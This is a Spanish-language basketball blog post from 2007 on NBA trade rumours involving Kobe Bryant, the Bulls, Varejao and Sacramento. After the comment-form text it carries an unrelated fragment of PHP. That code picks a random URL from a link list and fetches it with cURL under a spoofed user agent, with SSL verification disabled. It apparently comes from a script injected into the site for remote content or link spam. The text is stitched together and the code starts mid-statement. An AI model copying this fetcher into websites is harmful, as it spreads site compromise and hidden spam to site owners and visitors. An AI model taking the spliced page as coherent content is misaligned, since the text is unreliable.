Así no se puede trabajar

06 de November de 2007 por txusma

Imaginen por un momento que en su empresa empiezan a circular rumores de que van a mandar a unos cuantos empleados a una filial situada a más de 5.000 kilómetros. Y no sólo eso sino que, en su lugar, llegará uno de los considerados mejores directivos del mundo que intentará llevar a la empresa allí a donde usted no ha podido, al primer puesto de las listas especializadas. ¿Quién podría seguir trabajando igual que antes? ¿Alguien sería capaz de concentrarse y dar el 100% para su actual empresa?

 

Pues algo parecido está ocurriendo en los Chicago Bulls. Aunque los jugadores se esfuercen en demostrar lo contrario y declarar a los cuatro vientos su profesionalidad, es inevitable observar que los rumores sobre la posible llegada de Kobe Bryant han afectado al rendimiento del equipo. El equipo que tan buenas sensaciones dejó la temporada pasada y que entraba incluso en algunas quinielas este año para luchar por el anillo ha perdido los 3 partidos que ha jugado hasta el momento mostrando una apatía y una falta de ideas desconcertante. Ante esta situación la directiva de la franquicia se ha apresurado a suspender las negociaciones para intentar calmar y centrar a sus jugadores. Aunque es posible que en breve tengan que volver a hacer una declaración parecida porque ya se ha empezado a comentar la posibilidad de que Elton Brand vuelva la temporada que viene a la ciudad del viento, de la que los aficionados de los Bulls consideran que nunca debió salir.

Por su parte, Joe Dumars ha salido al paso con contundencia ante los rumores que afirmaban que los Detroit Pistons también estaban en la carrera por Kobe, cortando de raíz cualquier problema que pudiera surgir. Dumars, hombre inteligente donde los haya, no quiere que su equipo se distraiga ni un ápice.

Aparte de los ya habituales informes sobre el traspaso de Kobe, estos últimos días se ha hablado del posible regreso de Anderson Varejao, del que se dice que podría aceptar una oferta de los Cavs de 5 millones de dolares por un solo año, lejos de los más de 10 que demandaba hace pocas semanas. Seguramente Varejao se habrá visto reflejado en Latrell Sprewell, que no ha vuelto a jugar desde que decidió no aceptar las supuestas humillantes ofertas que recibía porque “tenía una familia que mantener”. Visto que podía quedarse todo el año sin jugar, finalmente el brasileño parece que ha decidido volver a demostrar en la cancha su entrega y fuerza e intentar el atraco nuevamente al año siguiente. Ahora sólo queda por ver qué tienen de cierto las informaciones que apuntan al lamentable estado de forma del brasileño.

Por último, se habla del proceso de reconstrucción que podría iniciar Sacramento en breve. Siendo así, jugadores como Ron Artest, Mike Bibby, Brad Miller, Rahim o Kenny Thomas podrían salir del equipo a cambio de otros en último año de contrato y jóvenes. Sería definitivamente el punto y final de aquellos Kings que nos maravillaron a principios de la actual década.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>